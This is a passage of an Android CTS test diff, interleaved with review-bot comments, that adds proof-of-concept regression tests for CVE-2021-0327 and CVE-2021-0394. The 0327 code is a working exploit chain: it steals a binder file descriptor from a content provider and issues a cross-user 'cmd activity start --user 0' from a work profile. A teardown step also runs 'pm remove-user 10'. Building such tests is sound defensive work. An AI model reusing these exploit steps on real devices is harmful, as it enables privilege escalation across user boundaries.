@@ -0,0 +1,113 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.permission3.cts + +import android.app.Activity +import android.app.AppOpsManager +import android.content.ComponentName +import android.content.Intent +import android.location.LocationManager +import android.support.test.uiautomator.By +import androidx.core.os.BuildCompat +import com.android.compatibility.common.util.AppOpsUtils.setOpMode +import com.android.compatibility.common.util.SystemUtil.callWithShellPermissionIdentity +import com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity +import org.junit.After +import org.junit.Assert.assertEquals +import org.junit.Assert.assertTrue +import org.junit.Assume.assumeTrue +import org.junit.Before +import org.junit.Test +import java.util.concurrent.TimeUnit + +/** + * Tests permission usage info action for location providers. + */ +class PermissionUsageInfoTest : BaseUsePermissionTest() { + val locationManager = context.getSystemService(LocationManager::class.java)!! + + @Before + fun installAppLocationProviderAndAllowMockLocation() { + installPackage(APP_APK_PATH_LOCATION_PROVIDER) + // The package name of a mock location provider is the caller adding it, so we have to let + // the test app add itself. 
+ setOpMode(APP_PACKAGE_NAME, AppOpsManager.OPSTR_MOCK_LOCATION, AppOpsManager.MODE_ALLOWED) + } + + @Before + fun allowMockLocation() { + // Allow ourselves to reliably remove the test location provider. + setOpMode( + context.packageName, AppOpsManager.OPSTR_MOCK_LOCATION, AppOpsManager.MODE_ALLOWED + ) + } + + @After + fun removeTestLocationProvider() { + locationManager.removeTestProvider(APP_PACKAGE_NAME) + } + + @Test + fun testLocationProviderPermissionUsageInfo() { + val locationProviderPackageName: String + if (BuildCompat.isAtLeastS()) { + // Add the test app as location provider. + val future = startActivityForFuture( + Intent().apply { + component = ComponentName( + APP_PACKAGE_NAME, "$APP_PACKAGE_NAME.AddLocationProviderActivity" + ) + } + ) + val result = future.get(TIMEOUT_MILLIS, TimeUnit.MILLISECONDS) + assertEquals(Activity.RESULT_OK, result.resultCode) + assertTrue( + callWithShellPermissionIdentity { + locationManager.isProviderPackage(APP_PACKAGE_NAME) + } + ) + locationProviderPackageName = APP_PACKAGE_NAME + } else { + // Test location provider doesn't count as location provier package before S. + val locationManager = context.getSystemService(LocationManager::class.java)!! + locationProviderPackageName = packageManager.getInstalledApplications(0) + .map { it.packageName } + .filter { + callWithShellPermissionIdentity { locationManager.isProviderPackage(it) } + } + .firstOrNull { + Intent(Intent.ACTION_VIEW_PERMISSION_USAGE) + .setPackage(it) + .resolveActivity(packageManager) != null + } + .let { + assumeTrue(it != null) + it!! + } + } + + runWithShellPermissionIdentity { + context.startActivity( + Intent(Intent.ACTION_MANAGE_APP_PERMISSIONS).apply { + putExtra(Intent.EXTRA_PACKAGE_NAME, locationProviderPackageName) + addFlags(Intent.FLAG_ACTIVITY_NEW_TASK) + } + ) + } + click(By.res("com.android.permissioncontroller:id/icon")) + } +} diff --git a/tests/tests/role/Android.bp b/tests/tests/role/Android.bp index bb35032e926..c3545b716f0 100644 
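Review bot: `testLocationProviderPermissionUsageInfo` ends with `click(By.res("com.android.permissioncontroller:id/icon"))` and asserts nothing afterwards, so as far as this hunk shows the test passes whenever the icon can be clicked, whether or not the permission-usage activity was launched (the `click` helper is defined outside the hunk and may do more). An explicit check on the outcome, or a comment stating what the click is expected to prove, would make the intent clear. In the pre-S branch, `val locationManager = context.getSystemService(LocationManager::class.java)!!` shadows the class property of the same name and can be dropped, and the comment above it misspells "provider" as "provier". `removeTestLocationProvider()` also runs on the pre-S path where no test provider was added; whether `removeTestProvider` tolerates that is not visible here.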
--- a/tests/tests/role/Android.bp +++ b/tests/tests/role/Android.bp @@ -32,7 +32,7 @@ android_test { "cts", "vts10", "general-tests", - "mts", + "mts-permission", ], data: [ diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp index e82f2e1a677..743ea88c00c 100644 --- a/tests/tests/security/Android.bp +++ b/tests/tests/security/Android.bp @@ -54,6 +54,7 @@ android_test { "src/**/*.java", "src/android/security/cts/activity/ISecureRandomService.aidl", "aidl/android/security/cts/IIsolatedService.aidl", + "aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl", ], //sdk_version: "current", platform_apis: true, diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml index a8cf61ad62b..31f4c59d79a 100644 --- a/tests/tests/security/AndroidManifest.xml +++ b/tests/tests/security/AndroidManifest.xml 
@@ -121,6 +121,52 @@ </intent-filter> </activity> + <activity android:name="android.security.cts.CVE_2021_0327.IntroActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.OtherUserActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.TestActivity"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name="android.security.cts.CVE_2021_0327.workprofilesetup.ProvisionedActivity"> + <intent-filter> + <action android:name="android.app.action.PROVISIONING_SUCCESSFUL" /> + <category android:name="android.intent.category.DEFAULT" /> + </intent-filter> + </activity> + + <receiver + android:name="android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver" + android:permission="android.permission.BIND_DEVICE_ADMIN"> + <meta-data + android:name="android.app.device_admin" + android:resource="@xml/device_admin" /> + <intent-filter> + <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /> + </intent-filter> + </receiver> + + <provider + android:name="android.security.cts.CVE_2021_0327.BadProvider" + android:authorities="android.security.cts.CVE_2021_0327.BadProvider" + android:exported="false" + android:grantUriPermissions="true" + android:process=":badprovider" /> + </application> <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner" diff --git a/tests/tests/security/AndroidTest.xml b/tests/tests/security/AndroidTest.xml index a7d1edeaeb8..6e0c8bc4f69 100644 --- a/tests/tests/security/AndroidTest.xml 
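Review bot: The three `CVE_2021_0327` activities (`IntroActivity`, `OtherUserActivity`, `TestActivity`) each carry a `MAIN`/`LAUNCHER` intent filter but no `android:exported` attribute, so they are exported implicitly and the CTS security APK gains three launcher entries. Stating `android:exported` explicitly on every component that has an intent filter, as the `BadProvider` entry already does with `android:exported="false"`, keeps the exposure deliberate and becomes mandatory once the APK targets API 31 or later. If only one entry point has to be launchable, the `LAUNCHER` category can be dropped from the other two. `ProvisionedActivity` and `AdminReceiver` have the same missing attribute.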
+++ b/tests/tests/security/AndroidTest.xml @@ -17,7 +17,8 @@ <option name="test-suite-tag" value="cts" /> <option name="config-descriptor:metadata" key="component" value="security" /> <option name="config-descriptor:metadata" key="parameter" value="not_multi_abi" /> - <option name="config-descriptor:metadata" key="parameter" value="instant_app" /> + <!-- CtsDeviceInfo target API is 23; instant app requires target API >= 26. --> + <option name="config-descriptor:metadata" key="parameter" value="not_instant_app" /> <option name="config-descriptor:metadata" key="parameter" value="secondary_user" /> <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> <option name="cleanup-apks" value="true" /> @@ -33,6 +34,16 @@ value="appops reset android.security.cts" /> </target_preparer> + <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer"> + <option name="teardown-command" + value="pm remove-user 10" /> + </target_preparer> + + <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer"> + <option name="teardown-command" + value="pm uninstall --user 0 android.security.cts" /> + </target_preparer> + <test class="com.android.tradefed.testtype.AndroidJUnitTest" > <option name="package" value="android.security.cts" /> <option name="runtime-hint" value="1h40m18s" /> diff --git a/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl new file mode 100644 index 00000000000..e71f2c8fc0d --- /dev/null +++ b/tests/tests/security/aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl @@ -0,0 +1,10 @@ +// IBadProvider.aidl +package android.security.cts.CVE_2021_0327; + +// Declare any non-default types here with import statements +import android.os.ParcelFileDescriptor; +interface IBadProvider { + ParcelFileDescriptor takeBinder(); + + oneway void exit(); +} 
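Review bot: The new teardown command `pm remove-user 10` in AndroidTest.xml hard-codes a user id, so on a device where user 10 already existed before the run (a secondary user or an existing managed profile) teardown deletes that user and its data. The id should come from whichever test created the user, with removal done in that test's own cleanup. Failing that, the preparer needs a comment such as `<!-- user 10 is assumed to be the profile created by the CVE_2021_0327 test; not safe on devices with existing secondary users -->`. The module also declares the `secondary_user` parameter a few lines above, which makes a pre-existing user 10 more likely. The second command, `pm uninstall --user 0 android.security.cts`, overlaps with `cleanup-apks` in the installer preparer and would benefit from a note on why it is needed.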
diff --git a/tests/tests/security/jni/Android.bp b/tests/tests/security/jni/Android.bp index b667f18252b..60f934869c7 100644 --- a/tests/tests/security/jni/Android.bp +++ b/tests/tests/security/jni/Android.bp @@ -20,6 +20,7 @@ cc_library { "android_security_cts_NativeCodeTest.cpp", "android_security_cts_MMapExecutableTest.cpp", "android_security_cts_EncryptionTest.cpp", + "android_security_cts_cve_2021_0394.cpp", ], shared_libs: [ "libcrypto", diff --git a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp index 7490d1ad37e..06e57f18930 100644 --- a/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp +++ b/tests/tests/security/jni/CtsSecurityJniOnLoad.cpp @@ -22,6 +22,7 @@ extern int register_android_security_cts_NativeCodeTest(JNIEnv*); extern int register_android_security_cts_SeccompTest(JNIEnv*); extern int register_android_security_cts_MMapExecutableTest(JNIEnv* env); extern int register_android_security_cts_EncryptionTest(JNIEnv* env); +extern int register_android_security_cts_cve_2021_0394(JNIEnv* env); jint JNI_OnLoad(JavaVM *vm, void *) { JNIEnv *env = NULL; @@ -46,5 +47,9 @@ jint JNI_OnLoad(JavaVM *vm, void *) { return JNI_ERR; } + if (register_android_security_cts_cve_2021_0394(env)) { + return JNI_ERR; + } + return JNI_VERSION_1_4; } diff --git a/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp new file mode 100644 index 00000000000..66b57925f93 --- /dev/null +++ b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp 
@@ -0,0 +1,51 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <jni.h> +#include <string.h> + +static constexpr char kDefaultValue = 'x'; +static constexpr size_t kStringLength = 4096; + +jboolean android_security_cts_cve_2021_0394_poc(JNIEnv* env, jobject thiz) { + (void) thiz; + char array[kStringLength]; + memset(array, kDefaultValue, kStringLength - 1); + array[kStringLength - 1] = 0; + jstring s = env->NewStringUTF(array); + jboolean isVulnerable = false; + char invalidChars[] = { '\xc0', '\xe0', '\xf0' }; + for (int c = 0; c < sizeof(invalidChars) / sizeof(char); ++c) { + char invalid = invalidChars[c]; + array[kStringLength - 2] = invalid; + s = env->NewStringUTF(array); + const char* UTFChars = env->GetStringUTFChars(s, nullptr); + if (UTFChars[kStringLength - 2] != '?') { + isVulnerable = true; + } + env->ReleaseStringUTFChars(s, UTFChars); + } + return isVulnerable; +} + +static JNINativeMethod gMethods[] = { { "poc", "()Z", + (void*) android_security_cts_cve_2021_0394_poc }, }; + +int register_android_security_cts_cve_2021_0394(JNIEnv* env) { + jclass clazz = env->FindClass("android/security/cts/CVE_2021_0394"); + return env->RegisterNatives(clazz, gMethods, + sizeof(gMethods) / sizeof(JNINativeMethod)); +} 
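Review bot: `register_android_security_cts_cve_2021_0394` passes the result of `FindClass` straight to `RegisterNatives`; if the class is not found, `clazz` is null with an exception pending and the call misbehaves instead of returning an error that `JNI_OnLoad` can turn into `JNI_ERR`. Add `if (clazz == nullptr) return JNI_ERR;` before registering. In `android_security_cts_cve_2021_0394_poc` the results of `NewStringUTF` and `GetStringUTFChars` are likewise used unchecked. `UTFChars[kStringLength - 2]` is also read without confirming the returned string is that long, so the test can itself read out of bounds if the conversion yields a shorter string; checking `env->GetStringUTFLength(s)` first avoids that. The first `NewStringUTF(array)` before the loop is overwritten without being used, and the loop counter should be `size_t` to match the `sizeof` expression it is compared with.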
diff --git a/tests/tests/security/res/raw/cve_2018_13925.ts b/tests/tests/security/res/raw/cve_2018_13925.ts Binary files differnew file mode 100644 index 00000000000..53656252aaf --- /dev/null +++ b/tests/tests/security/res/raw/cve_2018_13925.ts diff --git a/tests/tests/security/res/raw/cve_2019_2245.ts b/tests/tests/security/res/raw/cve_2019_2245.ts Binary files differnew file mode 100644 index 00000000000..4952466c6bc --- /dev/null +++ b/tests/tests/security/res/raw/cve_2019_2245.ts diff --git a/tests/tests/security/res/xml/device_admin.xml b/tests/tests/security/res/xml/device_admin.xml new file mode 100644 index 00000000000..5760898fa30 --- /dev/null +++ b/tests/tests/security/res/xml/device_admin.xml @@ -0,0 +1,14 @@ +<?xml version ="1.0" encoding ="utf-8"?> +<device-admin> + <uses-policies> +<!-- <limit-password/>--> +<!-- <watch-login/>--> +<!-- <reset-password/>--> +<!-- <force-lock/>--> +<!-- <wipe-data/>--> +<!-- <expire-password/>--> +<!-- <encrypted-storage/>--> +<!-- <disable-camera/>--> +<!-- <disable-keyguard-features/>--> + </uses-policies> +</device-admin> diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java new file mode 100644 index 00000000000..d0b6cad3084 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java 
@@ -0,0 +1,76 @@
+package android.security.cts.CVE_2021_0327;
+
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.Cursor;
+import android.net.Uri;
+import android.os.Bundle;
+import android.os.ParcelFileDescriptor;
+import android.os.Process;
+import android.os.RemoteException;
+import android.system.ErrnoException;
+import android.system.Os;
+
+import java.io.IOException;
+
+public class BadProvider extends ContentProvider {
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public Bundle call(String method, String arg, Bundle extras) {
+ if ("get_aidl".equals(method)) {
+ Bundle bundle = new Bundle();
+ bundle.putBinder("a", new IBadProvider.Stub() {
+ @Override
+ public ParcelFileDescriptor takeBinder() throws RemoteException {
+ for (int i = 0; i < 100; i++) {
+ try {
+ String name = Os.readlink("/proc/" + Process.myPid() + "/fd/" + i);
+ // Log.v("TAKEBINDER", "fd=" + i + " path=" + name);
+ if (name.startsWith("/dev/") && name.endsWith("/binder")) {
+ return ParcelFileDescriptor.fromFd(i);
+ }
+ } catch (ErrnoException | IOException e) {
+ }
+ }
+ return null;
+ }
+
+ @Override
+ public void exit() throws RemoteException {
+ System.exit(0);
+ }
+ });
+ return bundle;
+ }
+ return super.call(method, arg, extras);
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {
+ return null;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ return null;
+ }
+
+ @Override
+ public Uri insert(Uri uri, ContentValues values) {
+ return null;
+ }
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ return 0;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
+ return 0;
+ }
+}
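Review bot: The empty `catch (ErrnoException | IOException e) { }` in takeBinder() carries no explanation, and together with the fixed `i < 100` bound every failure ends in the same `return null`, so a reader of a failing run cannot tell why the descriptor was not found. I would put a comment in the handler such as `// readlink fails for unused descriptors; keep scanning`, and log once before `return null;`. The commented-out `// Log.v("TAKEBINDER", ...)` line should be deleted rather than committed. The file also has no license header, unlike CVE_2021_0327.java in the same directory.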
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java
new file mode 100644
index 00000000000..56408ee0c94
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java
@@ -0,0 +1,81 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.content.Context; +import android.content.Intent; +import android.platform.test.annotations.SecurityTest; +import android.test.AndroidTestCase; +import android.util.Log; +import androidx.test.runner.AndroidJUnit4; +import androidx.test.InstrumentationRegistry; +import org.junit.Test; +import org.junit.runner.RunWith; +import static org.junit.Assert.assertFalse; +import static org.junit.Assert.assertTrue; + +@SecurityTest +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0327 { + + private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts"; + private static final String TAG = "CVE_2021_0327"; + public static boolean testActivityRequested; + public static boolean testActivityCreated; + public static String errorMessage = null; + + private void launchActivity(Class<? 
extends Activity> clazz) { + final Context context = InstrumentationRegistry.getInstrumentation().getContext(); + final Intent intent = new Intent(Intent.ACTION_MAIN); + intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName()); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + context.startActivity(intent); + } + + /** + * b/175817081 + */ + @Test + @SecurityTest + public void testPocCVE_2021_0327() throws Exception { + Log.d(TAG, "test start"); + testActivityCreated=false; + testActivityRequested=false; + launchActivity(IntroActivity.class); + synchronized(CVE_2021_0327.class){ + if(!testActivityRequested) { + Log.d(TAG, "test is waiting for TestActivity to be requested to run"); + CVE_2021_0327.class.wait(); + Log.d(TAG, "got signal"); + } + } + synchronized(CVE_2021_0327.class){ + if(!testActivityCreated) { + Log.d(TAG, "test is waiting for TestActivity to run"); + CVE_2021_0327.class.wait(10000); + Log.d(TAG, "got signal"); + } + } + Log.d(TAG, "test completed. testActivityCreated=" + testActivityCreated); + if(errorMessage != null){ + Log.d(TAG, "errorMessage=" + errorMessage); + } + assertTrue(errorMessage==null); + assertFalse(testActivityCreated); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java new file mode 100644 index 00000000000..fd2af3a8da1 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java 
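Review bot: The first wait in testPocCVE_2021_0327 is `CVE_2021_0327.class.wait()` with no timeout and is guarded by `if` rather than a loop, so the test hangs indefinitely whenever OtherUserActivity never reaches its `notifyAll()` (for instance when work-profile provisioning does not complete), and a spurious wakeup lets it continue early. I would wait against a deadline in a loop and fail with a clear message when it passes, as sketched below with a new timeout constant whose value is to be chosen; the second wait already uses `wait(10000)` but has the same `if`. `errorMessage` is static and is not reset next to `testActivityCreated=false;`, so adding `errorMessage = null;` there keeps an earlier run in the same process from failing this one.

```java
// … unchanged: flag reset, launchActivity(IntroActivity.class) …
final long deadline = System.currentTimeMillis() + REQUEST_TIMEOUT_MS;
synchronized (CVE_2021_0327.class) {
    while (!testActivityRequested) {
        long remaining = deadline - System.currentTimeMillis();
        assertTrue("TestActivity was never requested", remaining > 0);
        Log.d(TAG, "test is waiting for TestActivity to be requested to run");
        CVE_2021_0327.class.wait(remaining);
    }
}
// … unchanged: second wait and final assertions …
```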
@@ -0,0 +1,129 @@ +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.app.AlertDialog; +import android.app.admin.DevicePolicyManager; +import android.content.ClipData; +import android.content.ComponentName; +import android.content.Intent; +import android.net.Uri; +import android.os.Bundle; +import android.view.View; +import android.util.Log; +import android.os.SystemClock; + +//import android.support.test.InstrumentationRegistry; +import androidx.test.InstrumentationRegistry; +import android.support.test.uiautomator.UiDevice; +import android.support.test.uiautomator.UiObject2; +import android.support.test.uiautomator.By; +import android.support.test.uiautomator.BySelector; +import java.io.*; +import java.util.stream.Collectors; + +import android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver; + +public class IntroActivity extends Activity { + + private static final int AR_WORK_PROFILE_SETUP = 1; + private static final String TAG = "CVE_2021_0327"; + + private void launchOtherUserActivity() { + Log.d(TAG,"launchOtherUserActivity()"); + Intent intent = new Intent(this, OtherUserActivity.class); + intent.setClipData(new ClipData("d", new String[]{"a/b"}, new ClipData.Item(Uri.parse("content://android.security.cts.CVE_2021_0327.BadProvider")))); + intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION); + startActivity(intent); + finish(); + } + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d(TAG,"IntroActivity.OnCreate()"); + if (isProfileOwner()) { + } else if (canLaunchOtherUserActivity()) { + launchOtherUserActivity(); + } else { + setupWorkProfile(null); + + //detect buttons to click + boolean profileSetUp=false; + String button; + java.util.List<UiObject2> objects; + UiDevice mUiDevice = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation()); + BySelector selector = By.clickable(true); + + + while(!profileSetUp){ + do { + Log.i(TAG, 
"waiting for clickable"); + SystemClock.sleep(3000); + } while((objects = mUiDevice.findObjects(selector)).size()==0); + for(UiObject2 o : objects){ + button=o.getText(); + Log.d(TAG,"button:" + button); + + if(button==null){ + continue; + } + + switch(button){ + case "Delete" : + o.click(); + Log.i(TAG, "clicked: Delete"); + break; + case "Accept & continue" : + o.click(); + Log.i(TAG, "clicked: Accept & continue"); + break; + case "Next" : + o.click(); + profileSetUp=true; + Log.i(TAG, "clicked: Next"); + break; + default : + continue; + } + break; + } + } + //end while(!profileSetUp); + } + } + + private boolean isProfileOwner() { + return getSystemService(DevicePolicyManager.class).isProfileOwnerApp(getPackageName()); + } + + private boolean canLaunchOtherUserActivity() { + Intent intent = new Intent("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY"); + return (getPackageManager().resolveActivity(intent, 0) != null); + } + + public void setupWorkProfile(View view) { + Log.d(TAG, "setupWorkProfile()"); + Intent intent = new Intent(DevicePolicyManager.ACTION_PROVISION_MANAGED_PROFILE); + intent.putExtra( + DevicePolicyManager.EXTRA_PROVISIONING_DEVICE_ADMIN_COMPONENT_NAME, + new ComponentName(this, AdminReceiver.class) + ); + startActivityForResult(intent, AR_WORK_PROFILE_SETUP); + } + + @Override + protected void onActivityResult(int requestCode, int resultCode, Intent data) { + Log.d(TAG, "onActivityResult()"); + if (requestCode == AR_WORK_PROFILE_SETUP) { + if (resultCode == RESULT_OK) { + launchOtherUserActivity(); + } else { + new AlertDialog.Builder(this) + .setMessage("Work profile setup failed") + .setPositiveButton("ok", null) + .show(); + } + } + super.onActivityResult(requestCode, resultCode, data); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java new file mode 100644 index 00000000000..3ed38dee35f 
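Review bot: The provisioning loop in IntroActivity.onCreate() runs `while(!profileSetUp)` on the main thread with `SystemClock.sleep(3000)` and no upper bound, and it only advances on the English labels "Delete", "Accept & continue" and "Next", so on a device with another locale or a different provisioning UI it never terminates and the test never gets a result. I would bound it, for example `for (int attempt = 0; !profileSetUp && attempt < MAX_ATTEMPTS; attempt++)` with a new constant, record a message in `CVE_2021_0327.errorMessage` when the bound is hit, and move the UiDevice polling off the activity's main thread. The empty `if (isProfileOwner()) { }` branch needs a comment saying why nothing is done in that case.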
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java
@@ -0,0 +1,94 @@ +package android.security.cts.CVE_2021_0327; + +import android.annotation.SuppressLint; +import android.app.Activity; +import android.app.AlertDialog; +import android.net.Uri; +import android.os.AsyncTask; +import android.os.Bundle; +import android.os.Handler; +import android.os.IBinder; +import android.os.ParcelFileDescriptor; +import android.os.ResultReceiver; +import android.view.View; +import android.util.Log; +import java.io.File; +import java.io.FileDescriptor; +import java.io.*; +import java.util.stream.Collectors; +import java.util.concurrent.TimeUnit; +import android.os.SystemClock; + +public class OtherUserActivity extends Activity { + + static ParcelFileDescriptor sTakenBinder; + private static final String TAG = "CVE_2021_0327"; + String errorMessage = null; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + doMakeProviderBad(null); + SystemClock.sleep(5000); + doStuff(null); + } + + public void doMakeProviderBad(View view) { + new MakeProviderBad().execute(); + } + + private class MakeProviderBad extends AsyncTask<Void, Void, Exception> { + + @Override + protected Exception doInBackground(Void... voids) { + try { + if (sTakenBinder != null) { + sTakenBinder.close(); + sTakenBinder = null; + } + + Uri uri = getIntent().getClipData().getItemAt(0).getUri(); + Bundle callResult = getContentResolver().call(uri, "get_aidl", null, null); + IBadProvider iface = IBadProvider.Stub.asInterface(callResult.getBinder("a")); + sTakenBinder = iface.takeBinder(); + if (sTakenBinder == null) { + throw new Exception("Failed to find binder of provider"); + } + iface.exit(); + } catch (Exception e) { + errorMessage = errorMessage==null ? 
e.toString() : errorMessage + ", " + e.toString(); + } + + return null; + } + + @Override + protected void onPostExecute(Exception e) { + } + } + + public void doStuff(View view) { + sendCommand("start", "--user", "0", "-d", "content://android.security.cts.CVE_2021_0327.BadProvider", "-n", "android.security.cts/.CVE_2021_0327.TestActivity"); + } + + @SuppressLint("PrivateApi") + void sendCommand(String... args) { + String[] command = new String[args.length + 2]; + command[0] = "/system/bin/cmd"; + command[1] = "activity"; + System.arraycopy(args, 0, command, 2, args.length); + + try{ + Runtime.getRuntime().exec(command); + } catch(Exception e){ + errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString(); + } + finally{ + synchronized(CVE_2021_0327.class){ + CVE_2021_0327.testActivityRequested=true; + CVE_2021_0327.errorMessage = errorMessage; + CVE_2021_0327.class.notifyAll(); + } + } + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java new file mode 100644 index 00000000000..d44a220ec9d --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java @@ -0,0 +1,17 @@ +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.os.Bundle; +import android.util.Log; + +public class TestActivity extends Activity { + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d("CVE_2021_0327","TestActivity.onCreate()"); + synchronized(CVE_2021_0327.class){ + CVE_2021_0327.testActivityCreated=true; + CVE_2021_0327.class.notifyAll(); + } + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java new file mode 100644 index 00000000000..d374dfd2edf 
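Review bot: OtherUserActivity.onCreate() orders its two steps with `SystemClock.sleep(5000)` on the main thread, so `doStuff(null)` runs after five seconds whether or not MakeProviderBad.doInBackground() has finished, and the outcome depends on timing. Calling `doStuff(null);` from the currently empty `onPostExecute` and deleting the sleep would make the order explicit. `errorMessage` is written from the AsyncTask thread and read in sendCommand() without synchronization, and the `Process` returned by `Runtime.getRuntime().exec(command)` is discarded, so a failing command is never noticed; both deserve at least a comment.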
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java
@@ -0,0 +1,7 @@
+package android.security.cts.CVE_2021_0327.workprofilesetup;
+
+import android.app.admin.DeviceAdminReceiver;
+
+public class AdminReceiver extends DeviceAdminReceiver {
+
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java
new file mode 100644
index 00000000000..1ae1c5dba4e
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java
@@ -0,0 +1,43 @@
+package android.security.cts.CVE_2021_0327.workprofilesetup;
+
+import android.app.Activity;
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.PackageManager;
+import android.os.Bundle;
+
+import android.security.cts.CVE_2021_0327.OtherUserActivity;
+
+public class ProvisionedActivity extends Activity {
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ getPackageManager().setComponentEnabledSetting(
+ new ComponentName(
+ this,
+ OtherUserActivity.class
+ ),
+ PackageManager.COMPONENT_ENABLED_STATE_ENABLED,
+ PackageManager.DONT_KILL_APP
+ );
+
+ DevicePolicyManager manager = getSystemService(DevicePolicyManager.class);
+ //IntentFilter intentFilter = new IntentFilter("com.example.clearedshell.OTHER_USER_ACTIVITY");
